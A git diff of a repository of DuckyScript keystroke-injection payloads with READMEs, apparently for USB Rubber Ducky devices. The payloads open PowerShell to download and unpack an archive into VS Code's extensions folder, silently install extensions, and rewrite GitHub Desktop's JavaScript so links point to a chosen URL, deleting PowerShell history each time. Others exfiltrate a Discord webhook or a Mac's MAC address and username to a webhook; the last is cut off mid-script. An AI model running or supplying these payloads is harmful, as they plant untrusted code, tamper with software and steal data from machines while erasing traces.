STRINGLN_POWERSHELL
|
||||
$url = "#ARCHIVE_LINK"
|
||||
$downloadPath = "$env:TEMP\#EXTENSION_NAME.zip"
|
||||
$extractPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
|
||||
Invoke-WebRequest -Uri $url -OutFile $downloadPath
|
||||
if (Test-Path -Path $downloadPath) {
|
||||
Expand-Archive -Path $downloadPath -DestinationPath $extractPath -Force
|
||||
Remove-Item -Path $downloadPath -Force
|
||||
Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
|
||||
}
|
||||
END_STRINGLN
|
|
@ -0,0 +1,55 @@
|
|||
# Install Official VSCode Extension
|
||||
|
||||
This script automates the installation of an official Visual Studio Code extension on Windows 10/11 systems. The extension to be installed is specified via the `publisher.extensionName` parameter. The script uses passive operating system detection to determine if the system is running Windows, and proceeds with the extension installation accordingly.
|
||||
|
||||
## First Of All!
|
||||
|
||||
Installing Arbotrary Visual Studio Code (VSCode) extensions can pose cybersecurity risks because extensions, often developed by third parties, have access to critical functionalities of the editor and the operating system. A malicious extension could execute harmful code, access local files, or exfiltrate sensitive data without the user's knowledge. Additionally, if extensions are not from trusted sources or are not regularly updated, they may contain vulnerabilities that attackers can exploit, compromising the security of both the system and the entire development environment.
|
||||
|
||||
So...
|
||||
- Before doing these tests make sure you have full permission from the owner of the computer in case it is not you.
|
||||
- Always check the source and source code before doing this
|
||||
- If even one line of code is not clear to you, you should not proceed at all because it takes only a little to do damage.
|
||||
|
||||
## Features
|
||||
|
||||
- **Passive Windows Detection:** The script includes an extension (`PASSIVE_WINDOWS_DETECT`) that passively detects if the operating system is Windows.
|
||||
- **VSCode Extension Installation:** It uses the `code --install-extension` command to install the specified VSCode extension.
|
||||
- **Windows 10/11 Compatibility:** Designed to work on Windows 10 and 11.
|
||||
- **PowerShell History Cleanup:** After installation, the PowerShell history is cleared.
|
||||
|
||||
## Usage
|
||||
|
||||
### Required Parameter
|
||||
|
||||
- **#EXTENSION**: This parameter represents the ID of the VSCode extension you wish to install. The ID should follow the format `publisher.extensionName` (e.g., `Aleff.duckyscriptcookbook`).
|
||||
|
||||
## Requirements
|
||||
|
||||
- **Operating System**: Windows 10 or 11
|
||||
- **PowerShell**
|
||||
- **Visual Studio Code**
|
||||
- **Internet**
|
||||
- **Permissions to execute commands in PowerShell**
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -0,0 +1,64 @@
|
|||
REM_BLOCK
|
||||
#####################################################
|
||||
# #
|
||||
# Title : Install Official VSCode Extension #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Windows 10/11 #
|
||||
# #
|
||||
#####################################################
|
||||
END_REM
|
||||
|
||||
REM replace 'publisher.extensionName' with the publisher id and extension id, for istance 'Aleff.duckyscriptcookbook'
|
||||
DEFINE #EXTENSION publisher.extensionName
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRINGLN PowerShell
|
||||
DELAY 1000
|
||||
|
||||
STRINGLN code --install-extension #EXTENSION; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
|
|
@ -4,7 +4,7 @@ This script can be used to change some advanced Windows settings to make it as e
|
|||
|
||||
This script is Plug-And-Play <3
|
||||
|
||||
**Category**: Execute
|
||||
**Category**: Execution
|
||||
|
||||
![](Make_Windows_performant_but_ugly_and_boring.gif)
|
||||
|
||||
|
@ -17,3 +17,25 @@ The script opens the Windows advanced settings via sysdm.cpl and accesses the ad
|
|||
### Dependencies
|
||||
|
||||
* Nothing is needed, this script is Plug-And-Play <3
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -3,7 +3,7 @@ REM # |
|
|||
REM # Title : Make Windows performant (but ugly and boring) |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execute |
|
||||
REM # Category : Execution |
|
||||
REM # Target : Windows 10/11 |
|
||||
REM # |
|
||||
REM ##################################################################
|
||||
|
|
|
@ -0,0 +1,46 @@
|
|||
# Play A Song On An iPhone
|
||||
|
||||
This script can be used to play a song really fast using an iPhone, so iOS system.
|
||||
|
||||
Open search bar, then open the Music app (I used the italian name so 'Telefono'), then delete what is (hidden) stored and write the number, then call it.
|
||||
|
||||
**Category**: Execution
|
||||
|
||||
## Dependencies
|
||||
|
||||
* The phone must be unlocked
|
||||
|
||||
## Test
|
||||
|
||||
- iPhone 14
|
||||
- iOS 16.4.1
|
||||
|
||||
## Settings
|
||||
|
||||
- You need to change the name of the application according to the language you have on your phone.
|
||||
|
||||
```DuckyScript
|
||||
[20] DEFINE #MUSIC-APP-NAME example
|
||||
```
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -0,0 +1,30 @@
|
|||
REM_BLOCK
|
||||
##############################################
|
||||
# #
|
||||
# Title : Play A Song On An iPhone #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : iPhone #
|
||||
# #
|
||||
##############################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - The phone must be unlocked
|
||||
|
||||
REM Tested on:
|
||||
REM - iPhone 14
|
||||
REM - iOS 16.4.1
|
||||
|
||||
REM You need to change the name of the application according to the language you have on your phone.
|
||||
DEFINE #MUSIC-APP-NAME example
|
||||
|
||||
DELAY 500
|
||||
GUI SPACE
|
||||
DELAY 300
|
||||
STRINGLN #MUSIC-APP-NAME
|
||||
DELAY 1000
|
||||
SPACE
|
||||
DELAY 500
|
||||
GUI h
|
|
@ -0,0 +1,69 @@
|
|||
# Replace Links In GithubDesktop
|
||||
|
||||
This script is written in **DuckyScript** and is designed to modify links in the GitHub Desktop application on Windows 10/11 systems. It automates the replacement of GitHub URLs with a custom URL defined by the user.
|
||||
|
||||
![](https://github.com/aleff-github/Deposito/blob/main/Replace_Links_In_GithubDesktop/GithubDesktop.gif?raw=true)
|
||||
|
||||
## Table of Contents
|
||||
|
||||
- [Features](#features)
|
||||
- [Prerequisites](#prerequisites)
|
||||
- [Usage](#usage)
|
||||
- [Credits](#credits)
|
||||
|
||||
## Features
|
||||
|
||||
This script replaces the hardcoded GitHub links in the `renderer.js` and `main.js` files inside the GitHub Desktop application with a custom link provided by the user. It does the following:
|
||||
|
||||
1. Detects the installation folder of GitHub Desktop.
|
||||
2. Identifies the latest installed version of GitHub Desktop. It may happen that there are multiple versions on the computer but it is always the most recent one that is used, I would suggest to Github Desktop developers to remove old versions that unnecessarily burden a computer.
|
||||
3. Replaces any occurrences of GitHub URLs in the `renderer.js` and `main.js` files with a new link defined by the user.
|
||||
|
||||
The script uses **PowerShell** to perform this replacement after detecting the operating system and target files.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- **Windows 10/11**
|
||||
- **GitHub Desktop** installed on the machine.
|
||||
|
||||
## Usage
|
||||
|
||||
1. **Modify the script**:
|
||||
- Define the new URL to replace the original GitHub link by modifying the `#NEW_LINK` variable in the script:
|
||||
```duckyscript
|
||||
DEFINE #NEW_LINK example.com
|
||||
```
|
||||
|
||||
2. **Customization**:
|
||||
- Ensure that the path to GitHub Desktop is correct. If GitHub Desktop is installed in a non-default location, modify the `#SUBDIRECTORY` variable accordingly:
|
||||
```ducky
|
||||
DEFINE #SUBDIRECTORY \AppData\Local\GitHubDesktop
|
||||
```
|
||||
|
||||
3. **Execution**:
|
||||
- Upon execution, the script will:
|
||||
- Open PowerShell.
|
||||
- Detect the GitHub Desktop installation directory.
|
||||
- Replace all GitHub URLs in the `renderer.js` and `main.js` files with the new URL you specified.
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -0,0 +1,109 @@
|
|||
REM_BLOCK
|
||||
#####################################################
|
||||
# #
|
||||
# Title : Replace Links In GithubDesktop #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Windows 10/11 #
|
||||
# #
|
||||
#####################################################
|
||||
END_REM
|
||||
|
||||
|
||||
REM REQUIRED - Define here the new url that will replace the original github link
|
||||
DEFINE #NEW_LINK example.com
|
||||
|
||||
REM DON'T CHANGE - This variable is a constant in this case, change it only if you are sure that the path to GithubDesktop is not the default
|
||||
DEFINE #SUBDIRECTORY \AppData\Local\GitHubDesktop
|
||||
|
||||
|
||||
REM_BLOCK
|
||||
Credits: Hak5 LLC
|
||||
Website: https://hak5.org/
|
||||
Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
|
||||
END_REM
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRINGLN PowerShell
|
||||
DELAY 1000
|
||||
|
||||
STRINGLN_POWERSHELL
|
||||
$path = Join-Path -Path $env:USERPROFILE -ChildPath "#SUBDIRECTORY"
|
||||
|
||||
$folders = Get-ChildItem -Path $path -Directory | Where-Object { $_.Name -like "app-*" }
|
||||
|
||||
$versions = $folders | ForEach-Object {
|
||||
[PSCustomObject]@{
|
||||
FolderName = $_.Name
|
||||
Version = [version]($_.Name -replace "app-", "")
|
||||
}
|
||||
}
|
||||
|
||||
$latestVersionFolder = $versions | Sort-Object Version -Descending | Select-Object -First 1
|
||||
|
||||
$latestFolderPath = Join-Path -Path $path -ChildPath $latestVersionFolder.FolderName
|
||||
$latestFolderPath += "\resources\app\"
|
||||
$renderer = "renderer.js"
|
||||
$main = "main.js"
|
||||
|
||||
$filePath = "$latestFolderPath$renderer"
|
||||
|
||||
$fileContent = Get-Content $filePath
|
||||
$regex = [regex]'(https:\/\/(?![\w\d\.\/\-]*api)[\w\d\.\/\-]*github[\w\d\.\/\-]+)'
|
||||
$modifiedContent = $fileContent -replace $regex, '#NEW_LINK'
|
||||
Set-Content -Path $filePath -Value $modifiedContent
|
||||
|
||||
|
||||
$filePath = "$latestFolderPath$main"
|
||||
$fileContent = Get-Content $filePath
|
||||
$regex = [regex]'openExternal\("(https:\/\/[\w\d\.\/\-]*github[\w\d\.\/\-]+)"\)'
|
||||
$modifiedContent = $fileContent -replace $regex, ('openExternal("#NEW_LINK")')
|
||||
Set-Content -Path $filePath -Value $modifiedContent; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
|
||||
|
||||
END_STRINGLN
|
|
@ -46,3 +46,25 @@ DELAY 4000
|
|||
- Receiver email address
|
||||
- Email Subject
|
||||
- Email Message
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -18,10 +18,28 @@ Opens a shell, download the vpn file, set the vpn through openvpn, erase traces.
|
|||
* Internet Connection
|
||||
* 'openvpn' installed
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
|
||||
* Set the VPN file link
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
This script can be used to change the default DNS server in Windows 11.
|
||||
|
||||
**Category**: Execute
|
||||
**Category**: Execution
|
||||
|
||||
## Description
|
||||
|
||||
|
@ -16,3 +16,25 @@ The script open the settings, then go to network settings, then go to wi-fi sett
|
|||
REM DNS IPv4 like Cloudflare DNS 1.1.1.1
|
||||
DEFINE DNS example
|
||||
```
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -3,7 +3,7 @@ REM # |
|
|||
REM # Title : Set An Arbitrary DNS (IPv4 version) |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execute |
|
||||
REM # Category : Execution |
|
||||
REM # Target : Windows 11 |
|
||||
REM # |
|
||||
REM ########################################################
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
This script can be considered by people who are new to the world of scripts written in DuckyScript so that they can understand how to start a PowerShell with administrator permissions on a Windows machine.
|
||||
|
||||
**Category**: Execute
|
||||
**Category**: Execution
|
||||
|
||||
## Description
|
||||
|
||||
|
@ -28,3 +28,25 @@ It is important to note that running PowerShell with administrator privileges in
|
|||
|
||||
- `STRINGLN Get-ExecutionPolicy -List`
|
||||
![](docs/3.png)
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -3,7 +3,7 @@ REM #
|
|||
REM # Title : Starting a PowerShell with administrator permissions in Windows |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execute |
|
||||
REM # Category : Execution |
|
||||
REM # Target : Windows 10-11 |
|
||||
REM # |
|
||||
REM ####################################################################################
|
||||
|
|
|
@ -19,3 +19,25 @@ This script open the Task Manager app, then go to search bar, then write the pro
|
|||
- Write the name of the process that you want to stop
|
||||
|
||||
`DEFINE PROCESS_NAME example`
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -18,3 +18,25 @@ Open a PowerShell, stop the Signal proccess if it runs and then execute the unin
|
|||
## Settings
|
||||
|
||||
- Nothing to set, this payload is Plug-And-Play <3
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -1,25 +1,69 @@
|
|||
REM ###############################################################
|
||||
REM # |
|
||||
REM # Title : Create And Exfiltrate A Webhook Of Discord |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Exfiltration |
|
||||
REM # Target : Windows 10-11 |
|
||||
REM # |
|
||||
REM ###############################################################
|
||||
REM_BLOCK
|
||||
###############################################################
|
||||
# #
|
||||
# Title : Create And Exfiltrate A Webhook Of Discord #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Exfiltration #
|
||||
# Target : Windows 10-11 #
|
||||
# #
|
||||
###############################################################
|
||||
END_REM
|
||||
|
||||
|
||||
REM Requirements:
|
||||
REM - Internet connection
|
||||
REM - Discord Installed
|
||||
|
||||
|
||||
REM You must define the Discord server name i.e. Hak5
|
||||
DEFINE #SERVER_NAME example
|
||||
|
||||
REM You must define your Discord webhook if you want to use this method for the exfiltration
|
||||
DEFINE #DISCORD_WEBHOOK example
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
REM Open Discord app
|
||||
GUI
|
||||
DELAY 1000
|
||||
|
@ -74,11 +118,11 @@ TAB
|
|||
DELAY 500
|
||||
TAB
|
||||
DELAY 500
|
||||
DOWN_ARROW
|
||||
DOWNARROW
|
||||
DELAY 500
|
||||
DOWN_ARROW
|
||||
DOWNARROW
|
||||
DELAY 500
|
||||
DOWN_ARROW
|
||||
DOWNARROW
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
|
|
@ -27,3 +27,25 @@ Open a PowerShell, download the Python script and execute it. The Python script
|
|||
|
||||
- Setup your Python script link in the payload.txt file
|
||||
- Setup your Discord webhook link in the script.py file
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -0,0 +1,25 @@
|
|||
# Exfiltrate Mac Address - MacOS
|
||||
|
||||
This payload is designed to retrieve the MAC address and username from a macOS system and send this information to a specified webhook.
|
||||
|
||||
### Details
|
||||
|
||||
- **Title**: Exfiltrate Mac Address
|
||||
- **Author**: bst04 - Aleff
|
||||
- **Version**: 1.0
|
||||
- **Category**: Exfiltration
|
||||
- **Target**: MacOS
|
||||
|
||||
### Dependencies
|
||||
|
||||
- Set the #WEBHOOK to complete the exfiltration
|
||||
`DEFINE #WEBHOOK example`
|
||||
|
||||
## How It Works 📜
|
||||
|
||||
1. Sets a user-defined webhook (`#WEBHOOK`) to complete the exfiltration
|
||||
2. Uses an extension (`EXTENSION DETECT_READY`) to detect when the device is ready with just a littebit more delay...
|
||||
3. After readiness is confirmed, the script:
|
||||
- Runs commands to open **Terminal**.
|
||||
- Acquire the mac address and the system user name
|
||||
- Send this informations through the Webhook
|
|
@ -0,0 +1,55 @@
|
|||
REM_BLOCK
|
||||
####################################################
|
||||
# #
|
||||
# Title : Exfiltrate Mac Address - MacOS #
|
||||
# Author : bst04 - Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Exfiltration #
|
||||
# Target : MacOS #
|
||||
# #
|
||||
####################################################
|
||||
END_REM
|
||||
|
||||
REM Set the #WEBHOOK to complete the exfiltration
|
||||
DEFINE #WEBHOOK example
|
||||
|
||||
EXTENSION DETECT_READY
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
|
||||
TARGETS:
|
||||
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #RESPONSE_DELAY 25
|
||||
DEFINE #ITERATION_LIMIT 120
|
||||
|
||||
VAR $C = 0
|
||||
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||
CAPSLOCK
|
||||
DELAY #RESPONSE_DELAY
|
||||
$C = ($C + 1)
|
||||
END_WHILE
|
||||
CAPSLOCK
|
||||
END_EXTENSION
|
||||
|
||||
REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
|
||||
DELAY 200
|
||||
|
||||
GUI SPACE
|
||||
DELAY 250
|
||||
STRINGLN TERMINAL
|
||||
DELAY 750
|
||||
STRINGLN mac=$(networksetup -getmacaddress en0)
|
||||
DELAY 750
|
